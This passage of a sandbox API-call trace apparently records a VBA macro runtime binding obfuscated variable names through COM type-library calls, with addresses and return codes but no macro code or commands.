pBstrLibName=0x144ca0) returned 0x0 [0069.970] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.970] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.970] IUnknown:Release (This=0x665ba50) returned 0xf [0069.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d196e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_lcQkDAx") returned 15 [0069.970] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lcQkDAx", lHashVal=0x10519e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x44006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x44006b00000000, pDummy=0x0) returned 0x0 [0069.970] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb24e2 | out: _Dst=0x144ec0) returned 0x0 [0069.970] ITypeComp:RemoteBind (in: This=0x665ba60, szName="PkAAwQ", lHashVal=0x1060fd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb250a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="PkAAwQ") returned 7 [0069.970] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="PkAAwQ", lHashVal=0x1060fd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb250a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="PkAAwQ") returned 7 [0069.970] ITypeComp:RemoteBind (in: This=0x665bd30, szName="PkAAwQ", lHashVal=0x1060fd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PkAAwQ") returned 0x1060fd [0069.971] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="PkAAwQ" | out: _Dst="PkAAwQ") returned 0x0 [0069.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="PkAAwQ") returned 7 [0069.971] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.971] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="PkAAwQ", lHashVal=0x1060fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.971] IUnknown:Release (This=0x665ba50) returned 0xf [0069.971] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.971] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="PkAAwQ", lHashVal=0x1060fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.971] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.971] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.971] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="PkAAwQ", lHashVal=0x1060fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.971] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.971] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.971] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="PkAAwQ", lHashVal=0x1060fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.971] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb250a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="PkAAwQ") returned 7 [0069.971] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="PkAAwQ", lHashVal=0x1060fd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.971] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.971] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb250a | out: _Dst=0x68767a0) returned 0x0 [0069.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_PkAAwQ") returned 0x10dba6 [0069.971] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_PkAAwQ" | out: _Dst="_B_var_PkAAwQ") returned 0x0 [0069.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_PkAAwQ") returned 14 [0069.971] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.971] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_PkAAwQ", lHashVal=0x10dba6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.971] IUnknown:Release (This=0x665ba50) returned 0xf [0069.971] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.971] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_PkAAwQ", lHashVal=0x10dba6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.971] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.972] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.972] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_PkAAwQ", lHashVal=0x10dba6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.972] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.972] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.972] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_PkAAwQ", lHashVal=0x10dba6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.972] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.972] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.972] IUnknown:Release (This=0x665ba50) returned 0xf [0069.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d199e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_PkAAwQ") returned 14 [0069.972] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_PkAAwQ", lHashVal=0x10dba6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0) returned 0x0 [0069.972] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb250a | out: _Dst=0x144ec0) returned 0x0 [0069.972] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vDXkBw_", lHashVal=0x10c8b3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2532, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vDXkBw_") returned 8 [0069.972] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vDXkBw_", lHashVal=0x10c8b3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2532, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vDXkBw_") returned 8 [0069.972] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vDXkBw_", lHashVal=0x10c8b3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.972] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vDXkBw_") returned 0x10c8b3 [0069.972] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="vDXkBw_" | out: _Dst="vDXkBw_") returned 0x0 [0069.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="vDXkBw_") returned 8 [0069.972] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.972] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vDXkBw_", lHashVal=0x10c8b3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.972] IUnknown:Release (This=0x665ba50) returned 0xf [0069.972] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.973] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vDXkBw_", lHashVal=0x10c8b3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.973] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.973] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.973] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vDXkBw_", lHashVal=0x10c8b3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.973] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.973] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.973] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vDXkBw_", lHashVal=0x10c8b3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.973] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2532, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vDXkBw_") returned 8 [0069.973] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vDXkBw_", lHashVal=0x10c8b3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.973] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.973] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb2532 | out: _Dst=0x68767a0) returned 0x0 [0069.973] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vDXkBw_") returned 0x10cc37 [0069.973] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_vDXkBw_" | out: _Dst="_B_var_vDXkBw_") returned 0x0 [0069.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_vDXkBw_") returned 15 [0069.973] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.973] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vDXkBw_", lHashVal=0x10cc37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.973] IUnknown:Release (This=0x665ba50) returned 0xf [0069.973] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.973] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vDXkBw_", lHashVal=0x10cc37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.973] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.973] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.973] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vDXkBw_", lHashVal=0x10cc37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.973] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.973] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.973] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vDXkBw_", lHashVal=0x10cc37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.974] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.974] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.974] IUnknown:Release (This=0x665ba50) returned 0xf [0069.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d19ce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_vDXkBw_") returned 15 [0069.974] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vDXkBw_", lHashVal=0x10cc37, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x42006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x42006b00000000, pDummy=0x0) returned 0x0 [0069.974] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2532 | out: _Dst=0x144ec0) returned 0x0 [0069.974] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ABQkxkC", lHashVal=0x10fdbe, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb255a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ABQkxkC") returned 8 [0069.974] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ABQkxkC", lHashVal=0x10fdbe, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb255a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ABQkxkC") returned 8 [0069.974] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ABQkxkC", lHashVal=0x10fdbe, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.974] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ABQkxkC") returned 0x10fdbe [0069.974] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ABQkxkC" | out: _Dst="ABQkxkC") returned 0x0 [0069.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ABQkxkC") returned 8 [0069.974] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.974] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ABQkxkC", lHashVal=0x10fdbe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.974] IUnknown:Release (This=0x665ba50) returned 0xf [0069.974] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.974] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ABQkxkC", lHashVal=0x10fdbe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.974] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.974] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.974] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ABQkxkC", lHashVal=0x10fdbe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.975] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.975] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.975] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ABQkxkC", lHashVal=0x10fdbe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.975] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb255a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ABQkxkC") returned 8 [0069.975] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ABQkxkC", lHashVal=0x10fdbe, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.975] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.975] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb255a | out: _Dst=0x68767a0) returned 0x0 [0069.975] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ABQkxkC") returned 0x10f1c1 [0069.975] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ABQkxkC" | out: _Dst="_B_var_ABQkxkC") returned 0x0 [0069.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ABQkxkC") returned 15 [0069.975] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.975] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ABQkxkC", lHashVal=0x10f1c1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.975] IUnknown:Release (This=0x665ba50) returned 0xf [0069.975] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.975] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ABQkxkC", lHashVal=0x10f1c1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.975] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.975] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.975] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ABQkxkC", lHashVal=0x10f1c1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.975] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.975] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.975] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ABQkxkC", lHashVal=0x10f1c1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.975] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.975] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.975] IUnknown:Release (This=0x665ba50) returned 0xf [0069.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d19fe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ABQkxkC") returned 15 [0069.976] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ABQkxkC", lHashVal=0x10f1c1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x78006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x78006b00000000, pDummy=0x0) returned 0x0 [0069.976] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb255a | out: _Dst=0x144ec0) returned 0x0 [0069.976] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.976] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.976] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.976] IUnknown:Release (This=0x665ba50) returned 0xf [0069.976] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.976] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.976] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.976] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.976] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0069.976] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.976] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.976] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.976] IUnknown:Release (This=0x665ba50) returned 0xf [0069.976] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.976] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.976] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.976] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x68767a0 [0069.977] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.977] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.977] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.977] IUnknown:Release (This=0x665ba50) returned 0xf [0069.977] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.977] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.977] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.977] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.977] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0069.977] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.977] ITypeLib:RemoteGetLibAttr (in: 